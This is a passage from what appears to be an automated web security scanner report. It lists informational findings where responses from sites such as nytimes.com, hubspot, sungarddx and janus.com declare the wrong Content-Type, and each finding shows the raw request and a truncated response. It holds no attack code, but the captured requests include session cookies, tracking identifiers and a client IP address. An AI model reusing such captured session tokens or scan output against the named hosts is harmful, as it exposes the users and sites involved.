Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; rsi_segs=D08734_70008|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305112816444:ss=1305112015513; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*18a4b=0:1; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 11:03:51 GMT
Content-Length: 12169
Content-Type: text/html
Expires: Thu, 12 May 2011 11:02:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 1977%5F0=A65E7F62E7765BC47864BFFE807574BD; path=/


try { // cache bg imgs in IE
   document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
var currentRegion = 'TopMovers';
function changeRegion(region){
   document.getElementById
...[SNIP]...

28.19. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pillsburylaw.app4.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: pillsburylaw.app4.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Thu, 12 May 2011 12:21:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=StsAonAvzQEkAAAAYjYwNjBlNjMtYTcyMi00NzE0LWI1NjQtNDMyYWNlNmQ3NDBj0; expires=Fri, 11-May-2012 12:21:46 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=148ff71c-54bf-42a7-b313-024966931ee5; domain=pillsburylaw.app4.hubspot.com; expires=Wed, 12-May-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/
Content-Length: 498


var hsUse20Servers = true;
var hsDayEndsIn = 56293;
var hsWeekEndsIn = 315493;
var hsMonthEndsIn = 1697893;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-12 08:21
...[SNIP]...

28.20. http://rapidssl-aia.geotrust.com/rapidssl.crt

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rapidssl-aia.geotrust.com
Path:   /rapidssl.crt

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /rapidssl.crt HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Proxy-Connection: Keep-Alive
Host: rapidssl-aia.geotrust.com

Response

HTTP/1.0 200 OK
Age: 1192
Date: Thu, 12 May 2011 10:53:50 GMT
Connection: Keep-Alive
Via: NS-248
ETag: "2ac0d8-3d9-f8397ac0"
Server: Apache/2.2.2 (Unix)
Last-Modified: Wed, 21 Jul 2010 18:28:35 GMT
Accept-Ranges: bytes
Content-Length: 985
Content-Type: text/plain
X-Cache: MISS from hostname

0...0...........6.0.    *.H.......0B1.0    ..U....US1.0...U.
.GeoTrust Inc.1.0...U....GeoTrust Global CA0..100219224505Z.200218224505Z0<1.0    ..U....US1.0...U.
..GeoTrust, Inc.1.0...U....RapidSSL CA0.."0
...[SNIP]...

28.21. https://services.sungarddx.com/admin/GetExternMedia.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   https://services.sungarddx.com
Path:   /admin/GetExternMedia.aspx

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /admin/GetExternMedia.aspx?DN=161476,1,Documents&MediaGuid=b5c415d7-82b3-4f6f-88e6-32e0157b8f64 HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/default.aspx?DN=3483,1,Documents&CommunityDN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v; ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:05 GMT
Content-Length: 2937

GIF89a=."...................................................................................................z..u..s..k..i..e..a.._.Z{.Vx.Ps.Lp.Im.Ci.@f.<c.7_.6^.1Z.+U.'R}#O{!Mz.Jw.Gu.Et.Aq.?o=n    :k.
...[SNIP]...

28.22. https://services.sungarddx.com/common/js/AdminFunctions.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   https://services.sungarddx.com
Path:   /common/js/AdminFunctions.asp

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /common/js/AdminFunctions.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 6977
Content-Type: text/html
Expires: Thu, 12 May 2011 23:40:46 GMT
Last-Modified: Thu, 12 May 2011 11:40:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/
Date: Thu, 12 May 2011 11:40:46 GMT


//<script language="javascript">
//<!--
///<summary>
///Misc administrative functions
///</summary>
///<scope>both</scope>


///<summary>
/// Used to get into the console and backend stuf
...[SNIP]...

28.23. http://topics.nytimes.com/adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

Summary

Severity:   Information
Confidence:   Firm
Host:   http://topics.nytimes.com
Path:   /adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /adx/bin/clientside/1e04ed9eQ2FQ25NyQ5EQ22X3qJqEQ22Q2AQ7BQ2AQ7BBQ26wQ5CQ7BBQ24J00 HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:16:09 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;

28.24. http://topics.nytimes.com/adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

Summary

Severity:   Information
Confidence:   Firm
Host:   http://topics.nytimes.com
Path:   /adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /adx/bin/clientside/4796c91fQ2FD_2g95T(bkO9Q51!Q51!Q24llQ3DFQ51Obcc HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; _chartbeat2=0b2fi2bgk284tw0q; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200307534:ss=1305198204263; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*192f3=0:3|s*1935f=0:2|s*18a4b=0:2|s*1780a=0:3|s*2554b=0:2; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|H07707_10872|D08734_72078|H07707_10950|H07707_10954|H07707_10987|H07707_11017|H07707_11018|H07707_10678|H07707_11020|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; nyt-m=FD213EE6971B98D7B9BD717BA7F666F0&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.18.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:38:31 GMT
Content-type: text/html
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache
Pragma: no-cache
Content-Length: 45

GIF89a.............!.......,..............X.;

28.25. http://topics.nytimes.com/svc/timespeople/bell.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://topics.nytimes.com
Path:   /svc/timespeople/bell.html

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /svc/timespeople/bell.html HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
Referer: http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html?url=%2Fsvc%2Ftimespeople%2Ftoolbar%2F1.0%2Fuser%3Fpage_url%3Dhttp%3A%2F%2Ftopics.nytimes.com%2Ftopics%2Freference%2Ftimestopics%2Fsubjects%2Fp%2Fprivate_equity%2Findex.html%3Finline%3Dnyt-classifier&method=get&params=&bell=http://topics.nytimes.com/svc/timespeople/bell.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; _chartbeat2=0b2fi2bgk284tw0q; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198956177:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:16:10 GMT
Content-type: text/html
Cache-Control: private
Content-Length: 54

<!-- This file is used by NewsPeple. Do not delete -->

28.26. http://translate.googleapis.com/translate_a/t

Summary

Severity:   Information
Confidence:   Firm
Host:   http://translate.googleapis.com
Path:   /translate_a/t

Issue detail

The response contains the following Content-type statement: The response states that it contains script. However, it actually appears to contain plain text.

Request

POST /translate_a/t?anno=3&client=te_lib&format=html&v=1.0 HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://honey.digiware.net/
Origin: http://honey.digiware.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 1400

q=Colombian%20HoneyNet%20Project&q=Un%20Cap%C3%ADtulo%20de%20Honeynet%20Project&q=Search&q=Home&q=About&q=Pages&q=About&q=Archives&q=August%202010&q=June%202010&q=Categories&q=%3Ca%20i%3D0%3EArticulos
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:07:17 GMT
Expires: Thu, 12 May 2011 13:07:17 GMT
Cache-Control: private, max-age=600
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=7f6e1447059fbca4:TM=1305205637:LM=1305205637:S=tQmIDboQEPIYiGYZ; expires=Sat, 11-May-2013 13:07:17 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1102

["Colombian Honeynet Project","A Chapter of the Honeynet Project","Search","Home","About","Pages","About","Archives","August 2010","June 2010","Categories","\x3ca i=0\x3eArticles\x3c/a\x3e \x3ca i=1\x
...[SNIP]...

28.27. http://trc.taboolasyndication.com/bloomberg/trc/2/json

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trc.taboolasyndication.com
Path:   /bloomberg/trc/2/json

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /bloomberg/trc/2/json?publisher=bloomberg&pv=2&list-size=9&list-id=rbox-t2v&id=237&uim=horizontal-t2v&intent=s&uip=horizontal-t2v&item-id=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&item-type=text&item-url=http%3A%2F%2Fwww.bloomberg.com%2Fnews%2F2011-05-05%2Fpingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&page-id=8b30818aaf47422a6a90e7b9a6ea55e93a6ee14a&cv=4-6-15-45512-2660204&uiv=default HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:52 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain; charset=utf-8
Set-Cookie: taboola_user_id=d80f7856-eeab-487a-988c-f15ce2ff8eb0;Path=/;Expires=Fri, 11-May-12 11:37:52 GMT
Set-Cookie: taboola_session_id=v1_96312820aedf9fdd5216e070e722f405_d80f7856-eeab-487a-988c-f15ce2ff8eb0_1305200272_1305200272;Path=/bloomberg/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv=;Path=/bloomberg/;Expires=Fri, 11-May-12 11:37:52 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 6664

trc_json_response =
{"trc":{"req":"9aa75fd4081f69b5978bd39a0832d6cc","session-id":"96312820aedf9fdd5216e070e722f405","session-data":"v1_96312820aedf9fdd5216e070e722f405_d80f7856-eeab-487a-988c-f15ce2f
...[SNIP]...

28.28. http://wd.sharethis.com/api/getCount2.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 360

stButtons.processCB({"url":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/","total":0,"ourl"
...[SNIP]...

28.29. http://webezines.kwithost.com/sx25Feed.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://webezines.kwithost.com
Path:   /sx25Feed.php

Issue detail

The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /sx25Feed.php?action=twitter_news&showtype=31&keyword=Investment%20Firms&format=json&callback=jsonp1305198220593&_=1305198220618 HTTP/1.1
Host: webezines.kwithost.com
Proxy-Connection: keep-alive
Referer: http://investmentfirmsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 3551
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305198220593([{"id":"1","image":"http:\/\/a1.twimg.com\/profile_images\/1169203534\/fc4af617-eadc-4bda-9fe3-f5f7155c45e5_normal.png","content":"\n\t <a href=\"http:\/\/twitter.com\/Cornis
...[SNIP]...

28.30. http://wolfgreenfield.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:01:58 GMT
Server: Apache/2.0.64 (Red Hat)
Last-Modified: Tue, 29 Jul 2008 19:11:49 GMT
ETag: "1e8c7bb-e36-696a0740"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@.............................i._=......~c>.....;........yV.....I/....u.......................r.......s.Z7...].....A&........................
...[SNIP]...

28.31. https://ww3.janus.com/advisor/images/st_facebook_footer.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://ww3.janus.com
Path:   /advisor/images/st_facebook_footer.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_facebook_footer.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"794-1304985196428"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 794
Date: Thu, 12 May 2011 11:24:16 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...

28.32. https://ww3.janus.com/advisor/images/st_facebook_header.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://ww3.janus.com
Path:   /advisor/images/st_facebook_header.gif

Issue detail

The response contains the following Content-type statement: The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_facebook_header.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"825-1304985196428"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 825
Date: Thu, 12 May 2011 11:24:17 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

28.33. https://ww3.janus.com/advisor/images/st_twitter_footer.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://ww3.janus.com
Path:   /advisor/images/st_twitter_footer.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /advisor/images/st_twitter_footer.gif HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310

Response

HTTP/1.1 200 OK
Server:
ETag: W/"884-1304985196428"
Last-Modified: Mon, 09 May 2011 23:53:16 GMT
Content-Type: image/gif
Content-Length: 884
Date: Thu, 12 May 2011 11:24:16 GMT

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    .............................................................
...[SNIP]...

28.34. https://ww3.janus.com/advisor/images/st_twitter_header.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   https://ww3.janus.com
Path:   /advisor/images/st_twitter_header.gif

Issue detail

